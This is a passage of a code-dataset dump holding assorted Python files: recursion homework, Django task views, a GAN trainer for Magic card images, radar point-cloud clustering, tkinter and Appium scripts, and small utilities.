== -1:\n return 1/x\n if y < 0:\n prod = myPow(x, y + 1)\n return 1 / x * prod\n if y > 0:\n prod = myPow(x, y - 1)\n return prod * x\n\nmyPow(2, -4)\n\n#7b\n#reduced time complexity recursive method to compute x ** y\n\ndef myRPow(x, y):\n if y == 1:\n return x\n if y == -1:\n return 1/x\n else:\n divy = y // 2\n result = myRPow(x, divy)\n if y % 2 == 0:\n return result * result\n else:\n if y > 0:\n return result * result * x\n else:\n return result * result * (1 / x)\n\nmyRPow(2,-4)\n\n# def myRPow(x, y):\n# if y == 0:\n# return 1\n# divy = y // 2\n# result = myRPow(x, divy)\n# if y % 2 == 0:\n# return result * result\n# if y < 0:\n# if y == -1:\n# return 1 / x\n# if y % 2 == 0:\n# return result * result\n# else:\n# return result * result * (1 / x)\n# else:\n# return result * result * x\n\nmyRPow(2,-4)\n\n#8\n#recursively count how many 'x' exist in a string\nhwtime += 15\ndef countX(string):\n count = 0\n if string[0] == 'x' or string[0] == 'X':\n count = 1\n if len(string) > 1:\n count += countX(string[1:])\n return count\n\ncountX('jaxbX')\n\n\n#9\n#recursively count how many 6s are in a list of ints with a starting index\nhwtime += 10\ndef containsSix(s, index):\n if s[index] == 6:\n return True\n if len(s[index:]) > 1:\n return containsSix(s, index + 1)\n return False\n\ncontainsSix([1, 5, 8, 6], 2)\ncontainsSix([5, 2, 3, 1, 0], 1)\n\n#10a\n#recursively remove repeating adjacent characters\nhwtime += 25\ndef cleanString(s):\n if len(s) == 0:\n return ''\n stringnew = ''\n if len(s) > 1:\n if s[0] == s[1]:\n s = s[1:]\n stringnew = cleanString(s[1:])\n if s[0] != stringnew:\n return s[0] + stringnew\n return s[0]\n\ncleanString('helll')\n\n#10b\n#recursively remove repeating characters anywhere in string\nhwtime += 50\ndef removeDuplicateCharacters(s):\n return removeDuplicateCharactersHelper(s, set())\n\ndef removeDuplicateCharactersHelper(s, seenChars):\n stringpart = ''\n stringnew = ''\n if len(s) >= 1:\n if s[0] not in seenChars:\n seenChars.add(s[0])\n stringpart = s[0]\n if len(s) > 1:\n stringnew = removeDuplicateCharactersHelper(s[1:],seenChars)\n return stringpart + stringnew\n\nremoveDuplicateCharacters('yyzzzabccyb')\n\n#12\n#recursive bubblesort\n# def rBubSort(lst):\n # if lst[0] != min(lst)\nhwtime += 45\ndef rBubSort(lst):\n next = []\n while lst[0] != min(lst):\n if lst[0] > lst[1]:\n lst[0], lst[1] = lst[1], lst[0]\n next = rBubSort(lst[1:])\n lst = [lst[0]] + next\n # zeroth = [lst[0]]\n # return zeroth + next\n return lst\n\na = [3, 6, 1, -55, 8, 10, -3]\nrBubSort(a)\n\n\n#13\n#binary search\nhwtime += 90\ndef binSearch(lst, val):\n if len(lst) == 0:\n return False\n else:\n key = len(lst)//2\n if lst[key] == val:\n return True\n else:\n if val < lst[key]:\n return binSearch(lst[:key], val)\n else:\n return binSearch(lst[key+1:], val)\n\n\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\nbinSearch(b, 6)\n\n\n#13b\n#binary search iteratively\n\ndef binSearchIter(lst, val):\n assert len(lst) > 0\n start = 0\n end = len(lst) - 1\n while start <= end:\n key = (start + end) // 2\n if lst[key] < val:\n start = key + 1\n elif lst[key] > val:\n end = key - 1\n else:\n break\n return lst[key] == val \n\nbinSearchIter(b, 3)\nc = [1, 2, 2]\nd = [-3, 0, 1, 4]\ne = []\nbinSearchIter(c, 2)\nbinSearchIter(c, 1)\nbinSearchIter(d, -3)\nbinSearchIter(d, 0)\n# binSearchIter(e, 0)","sub_path":"20181104/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426176908","text":"from controller import *\nfrom random import randint, random\n\n\ncontroller = Controller()\ndim = controller.getDim()\nwidth = dim[0]\nheight = dim[1]\n\nmyMap = [[[0, 0, 0] for y in range(height)] for x in range(width)]\n\ncompute = []\nnextC = []\n\nnumIslands = 1\ndisapear = .05\n#chooseStart\n\n\ndef genColor(ro, go, bo, x, y):\n\n r = myMap[x][y][0]\n g = myMap[x][y][1]\n b = myMap[x][y][2]\n if r+b+g <30:\n r = 255\n b = 255\n g = 255\n\n return [(ro)*r,(go)*g,(bo)*b]\n # return [(ro)*r,(ro)*r, (ro)*r]\n\ndef colorOdds():\n o = random()*-.3\n return o\n\ndef gen():\n global compute, nextC\n if len(compute) >0:\n for i in compute:\n x = i[0]\n y = i[1]\n o = i[2]\n if o > 0 and x >= 0 and x < width and y >= 0 and y < height and myMap[x][y] == [0, 0, 0]:\n odds = random()\n if odds <= i[2]:\n myMap[x][y]= genColor(colorOdds() + o, colorOdds()+ o, colorOdds() + o, i[3], i[4])\n controller.setPixel(x, y, myMap[x][y][0], myMap[x][y][1], myMap[x][y][2])\n nextC.append([x-1, y, o-random()*disapear, x, y])\n nextC.append([x+1, y, o-random()*disapear, x, y])\n nextC.append([x, y-1, o-random()*disapear, x, y])\n nextC.append([x, y+1, o-random()*disapear, x, y])\n # else:\n # print(x, y, \"did not\")\n controller.updateScreen(0)\n compute = nextC\n nextC = []\n gen()\n\ndef do(): \n global myMap \n for i in range(numIslands):\n x = randint(0,width)\n y = randint(0,height)\n compute.append([x, y, 1, 0, 0])\n gen()\n myMap = [[[0, 0, 0] for y in range(height)] for x in range(width)]\n\n\n# do()\nwhile True:\n do()\n controller.updateScreen(.1)\n\n","sub_path":"islandGenerationWeird.py","file_name":"islandGenerationWeird.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"318249288","text":"def divisors(x):\n div = []\n divisor = 1\n while divisor != x:\n if x%divisor == 0:\n div = div + [divisor]\n divisor += 1\n return (div)\n\ndef main():\n n = input (\"Enter n: \")\n n = int(n)\n\n print (divisors(n))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"week3/2-Resolve-with-Functions/divisors_with_f.py","file_name":"divisors_with_f.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36248812","text":"\"\"\"\nParticipant views from both user and participant perspectives.\n\nAll of participant_(list|add|edit|view) are from the user perspective.\n\"\"\"\nfrom datetime import date\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import modelformset_factory\n\nfrom participants.models import Participant\nfrom participants.forms import (\n AddParticipantForm,\n EditParticipantForm,\n MyTasksForm,\n)\nfrom participants.auth import authenticate, participant_required\nfrom tasks.forms import AddTaskForm\nfrom tasks.models import Task\nfrom utilities.commonutils import get_current_group\n\n\nSESSION_KEY = getattr(settings, 'PARTICIPANT_AUTH_SESSION_KEY', 'participant')\n\n\ndef participant_list(request):\n group = get_current_group(request)\n if group == None:\n return HttpResponseRedirect(reverse('index'))\n\n participants = Participant.lists.active().filter(group=group)\n selection = 'active'\n table_headings = ('Given name',\n 'Family name',\n 'Receiving reminders?',\n )\n\n if request.method == \"POST\":\n if request.POST['button']=='inactive':\n participants = Participant.lists.inactive().filter(group=group)\n selection = 'inactive'\n elif request.POST['button']=='former':\n participants = Participant.lists.former().filter(group=group)\n selection = 'former'\n\n menu = {'parent': 'participants',\n 'child': 'manage_participants',\n 'tips': 'manage_participants'\n }\n return render(request, 'participant_list.html', {\n 'menu': menu,\n 'participants': participants,\n 'selection': selection,\n 'table_headings': table_headings,\n })\n\n\ndef participant_add(request):\n group = get_current_group(request)\n if group == None:\n return HttpResponseRedirect(reverse('index'))\n\n if request.method == \"POST\":\n form = AddParticipantForm(group, request.POST, label_suffix='')\n if form.is_valid():\n form.save(group)\n return HttpResponseRedirect(reverse('participant-list'))\n else:\n form = AddParticipantForm(group, label_suffix='')\n\n menu = {'parent': 'participants',\n 'child': 'new_participant',\n 'tips': 'new_participant'\n }\n return render(request, 'participant_add.html', {\n 'menu': menu,\n 'form': form,\n })\n\n\ndef participant_edit(request, participant_id):\n group = get_current_group(request)\n if group == None:\n return HttpResponseRedirect(reverse('index'))\n\n participant = Participant.objects.get(pk=int(participant_id))\n if participant.group != group:\n return HttpResponseRedirect(reverse('index'))\n\n if request.method == \"POST\":\n if request.POST['button']=='delete_participant':\n participant.delete()\n return HttpResponseRedirect(reverse('participant-list'))\n elif request.POST['button'] == 'save_participant':\n form = EditParticipantForm(group, request.POST,\n instance=participant, label_suffix='')\n if form.is_valid():\n form.save(group)\n return HttpResponseRedirect(reverse('participant-list'))\n else:\n form = EditParticipantForm(group, instance=participant,\n label_suffix='')\n\n menu = {'parent': 'participants',\n 'child': 'manage_participants',\n 'tips': 'edit_participant'\n }\n return render(request, 'participant_edit.html', {\n 'menu': menu,\n 'form': form,\n 'participant_id': participant_id\n })\n\n\ndef participant_view(request, participant_id):\n group = get_current_group(request)\n if group == None:\n return HttpResponseRedirect(reverse('index'))\n\n participant = Participant.objects.get(pk=int(participant_id))\n if participant.group != group:\n return HttpResponseRedirect(reverse('index'))\n\n incomplete_tasks = Task.lists.incomplete_tasks().\\\n filter(participant=participant)\n table_headings = ('Description', 'Deadline',)\n\n menu = {'parent': 'participants', 'child': 'manage_participants'}\n return render(request, 'participant_view.html', {\n 'menu': menu,\n 'participant': participant,\n 'table_headings': table_headings,\n 'incomplete_tasks': incomplete_tasks,\n })\n\n\ndef my_tasks_auth(request, participant_id, token):\n \"\"\"Authenticate a participant using a token from the last 30 days.\"\"\"\n authenticate(request, participant_id, token)\n return HttpResponseRedirect(reverse('my-tasks'))\n\n\n@participant_required\ndef my_tasks(request):\n \"\"\"\n Displays a list of the participant's outstanding tasks and\n allows the participant to mark them as completed.\n \"\"\"\n participant_id = request.session.get(SESSION_KEY).get('id')\n participant = Participant.objects.get(pk=int(participant_id))\n\n MyTasksFormSet = modelformset_factory(\n Task,\n form=MyTasksForm,\n extra=0,\n )\n formset_queryset=Task.lists.incomplete_tasks().\\\n filter(participant=participant)\n\n if request.method == \"POST\":\n formset = MyTasksFormSet(request.POST)\n if formset.is_valid():\n formset.save(commit=False)\n for form in formset:\n participant_owns_task = (\n form.cleaned_data['id'].participant == participant\n )\n completion_date_set = form.cleaned_data['completion_date']\n if participant_owns_task and completion_date_set:\n form.save()\n return HttpResponseRedirect(reverse('my-tasks-done'))\n else:\n formset = MyTasksFormSet(queryset=formset_queryset)\n\n return render(request, 'my_tasks.html', {\n 'participant': participant,\n 'formset_has_contents': formset_queryset.exists(),\n 'formset': formset,\n })\n\n\n@participant_required\ndef my_tasks_done(request):\n \"\"\"\n Shows a success page with a list of the tasks which have been\n marked as completed, and a list of tasks still outstanding.\n \"\"\"\n today = date.today()\n\n participant_id = request.session.get(SESSION_KEY).get('id')\n participant = Participant.objects.get(pk=int(participant_id))\n\n tasks_outstanding = Task.lists.incomplete_tasks().\\\n filter(participant=participant)\n tasks_just_completed = Task.lists.completed_tasks().\\\n filter(participant=participant).\\\n filter(modified__gte=today).\\\n filter(participant_set_status_completed=True)\n\n return render(request, 'my_tasks_done.html', {\n 'participant': participant,\n 'no_of_tasks_outstanding': tasks_outstanding.count(),\n 'tasks_just_completed': tasks_just_completed,\n })\n","sub_path":"participants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"353440247","text":"import pytest\n\nfrom jupyterstan import parse_args\n\nDEFAULT_MODEL_NAME = \"_stan_model\"\n\nDEFAULT_OPTS = {\n \"model_name\": DEFAULT_MODEL_NAME,\n \"include_paths\": None,\n \"boost_lib\": None,\n \"eigen_lib\": None,\n \"verbose\": False,\n \"obfuscate_model_name\": True,\n}\n\n\ndef test_no_arguments():\n varname, opts = parse_args(\"\")\n assert varname == DEFAULT_MODEL_NAME\n assert opts == DEFAULT_OPTS\n\n\ndef test_model_name():\n test_name = \"test_name\"\n varname, opts = parse_args(test_name)\n test_opts = DEFAULT_OPTS\n test_opts[\"model_name\"] = varname\n assert varname == \"test_name\"\n assert opts == test_opts\n\n\ndef test_invalid_model_name():\n test_name = \"0test_name\"\n with pytest.raises(ValueError):\n varname, opts = parse_args(test_name)\n","sub_path":"tests/test_parsing_arguments.py","file_name":"test_parsing_arguments.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83113437","text":"from tkinter import *\nimport tkinter.messagebox\n\ndef askquit():\n answer = tkinter.messagebox.askokcancel(\"are you sure\",\"wana exit\");\n\n if(answer):\n print(\"Exit\")\n quit();\n\ndef demo():\n print(\"I am demo\");\n root.geometry(\"400x400\");\n \ndef work():\n print(\"Resize window\");\n root.geometry(\"200x200\");\ndef work1():\n print(\"Resize window\");\n root.geometry(\"400x400\");\n\n\nroot = Tk();\nroot.geometry(\"400x400\");\n\nmenu1= Menu(root);\nroot.config(menu=menu1);\n\nsubmenu = Menu(menu1);\nmenu1.add_cascade(label=\"File\", menu=submenu);\nsubmenu.add_command(label=\"New\", command=demo)\nsubmenu.add_command(label=\"open\")\nsubmenu.add_command(label=\"Save\")\nsubmenu.add_command(label=\"Save as\")\nsubmenu.add_command(label=\"Exit\", command=askquit)\n\nsubmenu2 = Menu(menu1);\nmenu1.add_cascade(label=\"Edit\", menu=submenu2);\nsubmenu2.add_command(label=\"Resize\",command=work)\nsubmenu2.add_command(label=\"Reset\",command=work1)\n\nsubmenu3 = Menu(menu1);\nmenu1.add_cascade(label=\"View\", menu=submenu3);\n\nsubmenu4 = Menu(menu1);\nmenu1.add_cascade(label=\"Language\", menu=submenu4);\n\nsubmenu5 = Menu(menu1);\nmenu1.add_cascade(label=\"Tools\", menu=submenu5);\n\nsubmenu6 = Menu(menu1);\nmenu1.add_cascade(label=\"Exit\", menu=submenu6);\n\n\n\n\nroot.mainloop()","sub_path":"gui/custome_quit.py","file_name":"custome_quit.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201835651","text":"#!/usr/bin/python\n# coding=utf-8\n# -*- encoding: utf-8 -*-\n\nfrom datetime import datetime\n\nclass period:\n \n def __init__(self, start, end, isLocked):\n self.start = start\n self.end = end\n self.isLocked = isLocked\n","sub_path":"battleground/period.py","file_name":"period.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400087017","text":"#/////////////////////////////////////////////////////////////////////////\n# script: createFinalOutDir.py\n# author: Lincoln\n# date: 3.18.19\n#\n# want to make one big dir with all of my filtered/unfiltered cells: \n# scVCF_filtered_all/\n# would be much nicer to do this on a jupyter notebook, buttt thats harder from EC2\n# potential problem here is gonna be that we've got vcf AND csv files in this \n# output dir\n#/////////////////////////////////////////////////////////////////////////\nimport os \nimport shutil \n\nfilterDir = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/filteredOut/'\nfilterDir_list = os.listdir(filterDir)\n\nfilteredCells = []\nfor f in filterDir_list:\n\tcell = f.strip('_unique.vcf')\n\tfilteredCells.append(cell)\n\n\nepiDir = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/scVCF/'\nepiDir_list = os.listdir(epiDir)\n\nepiCells = []\nfor f in epiDir_list:\n\tcell = f.strip('.vcf')\n\tepiCells.append(cell)\n\n# get cells in epiCells but NOT filteredCells\nnonFilteredCells = set(epiCells) - set(filteredCells)\n\nnonFilteredCells_list = []\nfor cell in nonFilteredCells:\n\tf = cell + '.vcf' \n\tnonFilteredCells_list.append(f)\n\n\n# copy over the non-filtered cells\noutPATH = '/home/ubuntu/code/SNP_calling_pipeline/bulkAnalysis/scVCF_filtered_all/'\nfor file in nonFilteredCells_list:\n\tsrc = epiDir + file\n\tdst = outPATH + file\n\tshutil.copyfile(src, dst)\n\n# copy over all the filtered cells\nfor file in filterDir_list:\n\tf = file.strip('_unique.vcf')\n\tf = f + '.vcf'\n\tsrc = filterDir + file\n\tdst = outPATH + f\n\tshutil.copyfile(src, dst)\n\n#/////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////","sub_path":"bulkAnalysis/createFinalOutDir.py","file_name":"createFinalOutDir.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473743181","text":"#!/usr/bin/env python\nimport rospy\nimport math\nimport ros_numpy\nimport numpy as np\nfrom sensor_msgs.msg import PointCloud2\nimport std_msgs.msg\nimport sensor_msgs.point_cloud2 as pcl2\nfrom sklearn.cluster import DBSCAN\nfrom collections import Counter\nimport matplotlib.pyplot as plt\n\n\n\"\"\"\nDirection Convention:\ny-axis = Sideways, right -ve \nx-axis = Front and back, front +ve\n\"\"\"\ndef get_cluster(arr):\n db = DBSCAN(eps=0.05, min_samples=3).fit(arr)\n labels = db.labels_\n Counter(labels)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n labels = db.labels_\n n_clusters_ = len(set(labels)) - (1 if -1 else 0)\n unique_labels = set(labels)\n colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))\n ans = []\n\n for k, col in zip(unique_labels, colors):\n if k == -1:\n # Black used for noise.\n col = 'k'\n\n class_member_mask = (labels == k)\n\n xy = arr[class_member_mask & ~core_samples_mask] \n if (k != -1):\n point = np.mean(xy, axis = 0)\n ans.append(point)\n xy = arr[class_member_mask & core_samples_mask]\n\n points = np.asarray(ans)\n # print(np.shape(points))\n return points\n\ndef compute_velocity(points):\n time_elapsed = 0.0338\n print(points)\n if (len(points) > 0):\n print(\"Computing for this\")\n pass \n\n\ndef callback(data):\n pc = ros_numpy.numpify(data)\n # points=np.zeros((pc.shape[0],3))\n # points[:,0]=pc['x']\n # points[:,1]=pc['y']\n # points[:,2]=pc['z']\n # x = points[:,0]\n # y = points[:,1]\n # z = points[:,2]\n # print(pc)\n\n vals = []\n\n\n # Filtering out the far-off points\n for p in pc:\n if (0.2 < p['x'] < 5):\n if (-1.0 < p['y'] < 1.0):\n vals.append(p)\n\n vals = np.asarray(vals)\n points=np.zeros((vals.shape[0],3))\n points[:,0]=vals['x']\n points[:,1]=vals['y']\n points[:,2]=vals['z']\n # print(\"Printing the vals\")\n # print(points)\n # print(np.shape(vals), np.shape(pc))\n # print(\"#\"*35)\n ans = get_cluster(points)\n # print(\"#\"*35)\n # print(ans)\n # print(\"#\"*35)\n\n # compute_velocity(ans) # Currently not working as timestamp is zero\n\n # Code to publish points\n pcl_pub = rospy.Publisher(\"/deltarc_radar_position\", PointCloud2)\n cloud_points = [[0, -1.5, 0.0],[0, 1.5, 0.0], [5, -1.5, 0.0],[5, 1.5, 0.0]]\n cloud_points = ans\n #header\n header = std_msgs.msg.Header()\n header.stamp = rospy.Time.now()\n header.frame_id = 'ti_mmwave_pcl'\n #create pcl from points\n scaled_polygon_pcl = pcl2.create_cloud_xyz32(header, cloud_points)\n #publish \n pcl_pub.publish(scaled_polygon_pcl)\n \n\n\ndef reader():\n # pub = rospy.Publisher('chatter', String, queue_size=10)\n rospy.init_node('clustered_data', anonymous=True)\n rospy.loginfo(\"Getting the data\")\n cloud = rospy.Subscriber(\"/ti_mmwave/radar_scan_pcl\", PointCloud2,callback)\n rospy.spin()\n # rate = rospy.Rate(10) # 10hz\n # while not rospy.is_shutdown():\n # hello_str = \"hello world %s\" % rospy.get_time()\n # rospy.loginfo(hello_str)\n # pub.publish(hello_str)\n # rate.sleep()\n\nif __name__ == '__main__':\n try:\n reader()\n except rospy.ROSInterruptException:\n pass","sub_path":"radar_clustering.py","file_name":"radar_clustering.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466292910","text":"\"\"\"Trains a GANEstimator on Magic data.\"\"\"\n\nimport os\nimport multiprocessing\n\nimport numpy as np\nimport scipy.misc\nimport tensorflow as tf\nimport tensorflow.contrib.gan as tfgan\n\nfrom utils import data_provider\nfrom utils import networks\nfrom utils import download_and_convert_magic\n\nFLAGS = tf.flags.FLAGS\n\n\ndef define_flags():\n tf.flags.DEFINE_integer('batch_size', 32,\n 'The number of images in each train batch.')\n tf.flags.DEFINE_integer('max_number_of_steps', 50000,\n 'The maximum number of gradient steps.')\n tf.flags.DEFINE_integer('noise_dims', 512,\n 'Dimensions of the generator noise vector')\n tf.flags.DEFINE_integer('image_dims', 256,\n 'The size images should be redimentioned to')\n\n tf.flags.DEFINE_string('dataset_dir', './magic_data/', 'Location of data.')\n tf.flags.DEFINE_string('eval_dir', '/tmp/magic-estimator/',\n 'Directory where the results images are saved to.')\n tf.flags.DEFINE_string('model_dir', './magic-model/',\n 'Directory where the checkpoints and model are saved.')\n tf.flags.DEFINE_string('gen_dir', './gen_img/',\n 'Directory where the images from summaries are saved.')\n\n tf.flags.DEFINE_integer('kmp_blocktime', 0,\n 'Sets the time, in milliseconds, that a thread should wait, after completing the '\n 'execution of a parallel region, before sleeping.')\n tf.flags.DEFINE_integer('kmp_settings', 1,\n 'Enables (true) or disables (false) the printing of OpenMP* run-time library environment '\n 'variables during program execution.')\n tf.flags.DEFINE_integer('num_intra_threads', 0,\n 'Specifies the number of threads to use. 0 will result in the value being set to the '\n 'number of logical cores')\n tf.flags.DEFINE_string('kmp_affinity', 'granularity=fine,verbose,compact,1,0',\n 'Enables the run-time library to bind threads to physicalprocessing units.')\n\n tf.flags.DEFINE_integer('num_parallel_readers', multiprocessing.cpu_count(),\n 'Level of parallelism.')\n tf.flags.DEFINE_integer('num_parallel_calls', multiprocessing.cpu_count(),\n 'Level of parallelism.')\n tf.flags.DEFINE_integer('prefetch_buffer_size', 1,\n 'Number of element in prefetch element buffer '\n '(should be equal to number of element consumed by one training step).')\n tf.flags.DEFINE_integer('shuffle_buffer_size', 1000,\n 'The number of elements from this dataset from which the new dataset will sample.')\n\n os.environ[\"KMP_BLOCKTIME\"] = str(FLAGS.kmp_blocktime)\n os.environ[\"KMP_SETTINGS\"] = str(FLAGS.kmp_settings)\n os.environ[\"KMP_AFFINITY\"] = FLAGS.kmp_affinity\n if FLAGS.num_intra_threads > 0:\n os.environ[\"OMP_NUM_THREADS\"] = str(FLAGS.num_intra_threads)\n\n\ndef _generator(noise, mode):\n \"\"\"generator with extra argument for tf.Estimator's `mode`.\"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n return networks.generator(noise, is_training=is_training)\n\n\ndef save_images_from_events_summaries(output_dir):\n if not tf.gfile.Exists(output_dir):\n tf.gfile.MakeDirs(output_dir)\n with tf.Session():\n for data_filename in os.listdir(FLAGS.model_dir):\n if 'events.out' not in data_filename:\n continue\n\n image_str = tf.placeholder(tf.string)\n im_tf = tf.image.decode_image(image_str)\n try:\n for e in tf.train.summary_iterator(os.path.join(FLAGS.model_dir, data_filename)):\n for v in e.summary.value:\n if not v.tag == 'generated_data/image':\n continue\n im = im_tf.eval({image_str: v.image.encoded_image_string})\n output_fn = os.path.realpath('{}/image_{:05d}.png'.format(output_dir, e.step))\n print(\"Saving '{}'\".format(output_fn))\n scipy.misc.imsave(output_fn, im)\n except tf.errors.DataLossError:\n pass\n\n\ndef main(_):\n tf.logging.set_verbosity(tf.logging.INFO)\n\n define_flags()\n\n if not tf.gfile.Exists(FLAGS.dataset_dir):\n tf.gfile.MakeDirs(FLAGS.dataset_dir)\n download_and_convert_magic.run(FLAGS.dataset_dir)\n\n shape = download_and_convert_magic.get_shape()\n\n # Initialize GANEstimator with options and hyperparameters.\n gan_estimator = tfgan.estimator.GANEstimator(\n generator_fn=_generator,\n discriminator_fn=networks.discriminator,\n generator_loss_fn=tfgan.losses.wasserstein_generator_loss,\n discriminator_loss_fn=tfgan.losses.wasserstein_discriminator_loss,\n generator_optimizer=tf.train.AdamOptimizer(0.001, 0.5, use_locking=True),\n # discriminator_optimizer=tf.train.GradientDescentOptimizer(0.5, use_locking=True),\n discriminator_optimizer=tf.train.AdamOptimizer(0.0001, 0.5),\n add_summaries=tfgan.estimator.SummaryType.IMAGES,\n model_dir=FLAGS.model_dir,\n config=tf.estimator.RunConfig(keep_checkpoint_max=3),\n # can't use because still not functional #, train_distribute=tf.contrib.distribute.MirroredStrategy()),\n get_hooks_fn=tfgan.get_joint_train_hooks(\n train_steps=tfgan.GANTrainSteps(3, 2)))\n\n gan_estimator.train(lambda: data_provider.provide_data(FLAGS.dataset_dir, shape),\n max_steps=FLAGS.max_number_of_steps)\n\n # Run inference.\n prediction_iterable = gan_estimator.predict(lambda: tf.random_normal([36, FLAGS.noise_dims]))\n predictions = [next(prediction_iterable) for _ in range(36)]\n\n # Nicely tile.\n image_rows = [np.concatenate(predictions[i:i + 6], axis=0) for i in\n range(0, 36, 6)]\n tiled_image = np.concatenate(image_rows, axis=1)\n\n # Write to disk.\n if not tf.gfile.Exists(FLAGS.eval_dir):\n tf.gfile.MakeDirs(FLAGS.eval_dir)\n scipy.misc.imsave(os.path.join(FLAGS.eval_dir, 'gan.png'), tiled_image)\n\n # save_images_from_events_summaries(output_dir=FLAGS.gen_dir)\n return 0\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"GANs/magic/Magic_GAN.py","file_name":"Magic_GAN.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145676054","text":"import re\n\ndef read_file(path):\n with open(path, 'r') as file:\n t = file.read()\n return t\n\n\ndef _update_dict(dictionary, key, val):\n try:\n dictionary[key] += val\n except:\n if (key is not None) and (len(key)>0):\n dictionary[key] = val\n\n\ndef _valid_char(char):\n if char not in '\" : ; , . - + = / \\ | [ ] { } ( ) * ^ &'.split():\n return char\n\n\ndef _coalesce(*args):\n for i in args:\n if i is not None:\n return i\n\n\ndef _clean_word(word):\n word = word.lower()\n cword = ''.join([_coalesce(_valid_char(c), '') for c in word])\n return cword\n\n\ndef split_string(string):\n items = []\n for item in string.split():\n for sub in item.split():\n items.append(sub)\n return items\n\n\ndef word_count(string):\n words = {}\n count = 0\n\n for word in split_string(string):\n cword = _clean_word(word)\n _update_dict(words, cword, 1)\n\n return words\n\nif __name__ == \"__main__\":\n print(word_count(\"\"))\n print(word_count(\"Hello\"))\n print(word_count('Hello, my cat. And my cat doesn\\'t say \"hello\" back.'))\n print(word_count('This is a test of the emergency broadcast network. This is only a test.'))","sub_path":"applications/word_count/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357583032","text":"#重新封装request\nimport requests\n\ndef visit(url,method='post',params=None,data=None,json=None,files=None,**kwargs):\n res=requests.request(method,url,params=params,data=data,json=json,files=files,**kwargs)\n try:\n return res.json()#返回json格式\n except Exception as e:\n print(\"格式错误{}\".format(e))\n\n\n\n\n\n\n\n","sub_path":"object/common/handler_request.py","file_name":"handler_request.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"235070361","text":"import os, sys\n\nhome = os.getenv(\"HOME\")\ndefaultEnvText = ('PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games\"')\n\nf = open(home + '/environment', 'w')\nf.write(defaultEnvText +'\\n')\nf.close()\n\nos.system('sudo mv ' + home + '/environment /etc/')\n","sub_path":"Xubuntu_Proxy_Remove.py","file_name":"Xubuntu_Proxy_Remove.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294887013","text":"from Android.fengzhuang.Android_Function import *\r\nfrom Android.fengzhuang.Android_FatherClass import *\r\nfrom appium.webdriver.common.touch_action import TouchAction\r\n\r\n'''此case添加三个监控app,再依次删除'''\r\n\r\n\r\n'''初始化driver'''\r\npackageName = readConfigInfo('iTest','package')\r\nactivityName = readConfigInfo('iTest','activity')\r\n\r\n'''loc元素'''\r\nadd_loc = (\"id\",\"iflytek.testTech.propertytool:id/app_icon\")\r\n\r\n#添加页面的app\r\nsettings_loc = (\"name\",\"Appium Settings\")\r\nsettingClassName = \"android.widget.TextView\"\r\nsystem_loc = (\"name\",\"Android系统\")\r\n# apiDemo_loc = (\"name\",\"Android System WebView\")\r\nkeybord_loc = (\"name\",\"Android 键盘 (AOSP)\")\r\ninputClassName=\"android.widget.EditText\"\r\ninputText=\"请输入需要监控的APP名称\"\r\ninput_loc =(\"name\",\"请输入需要监控的APP名称\")\r\ncomfirm_loc = (\"name\",\"确定\")\r\n#监控应用左边的一支笔符号\r\ndelete_loc = (\"id\",\"iflytek.testTech.propertytool:id/monitor_del_icon\")\r\n\r\n#主页红色删除标签\r\ndel_icon_loc=(\"id\",\"iflytek.testTech.propertytool:id/app_del\")\r\npower_loc=(\"name\",\"电量\")\r\n\r\nif __name__==\"__main__\":\r\n driver = getDriver(packageName,activityName)\r\n f=Father(driver)\r\n f.find_element_loc(power_loc)#等待\"电量\"出现\r\n f.find_element_loc(add_loc).click()#点击 添加图标\r\n f.find_UiSelector_class(settingClassName)#找到Appium Setting\r\n print(\"找打元素Appium Setting\")\r\n f.find_UiSelector_cla_text(inputClassName,inputText)\r\n 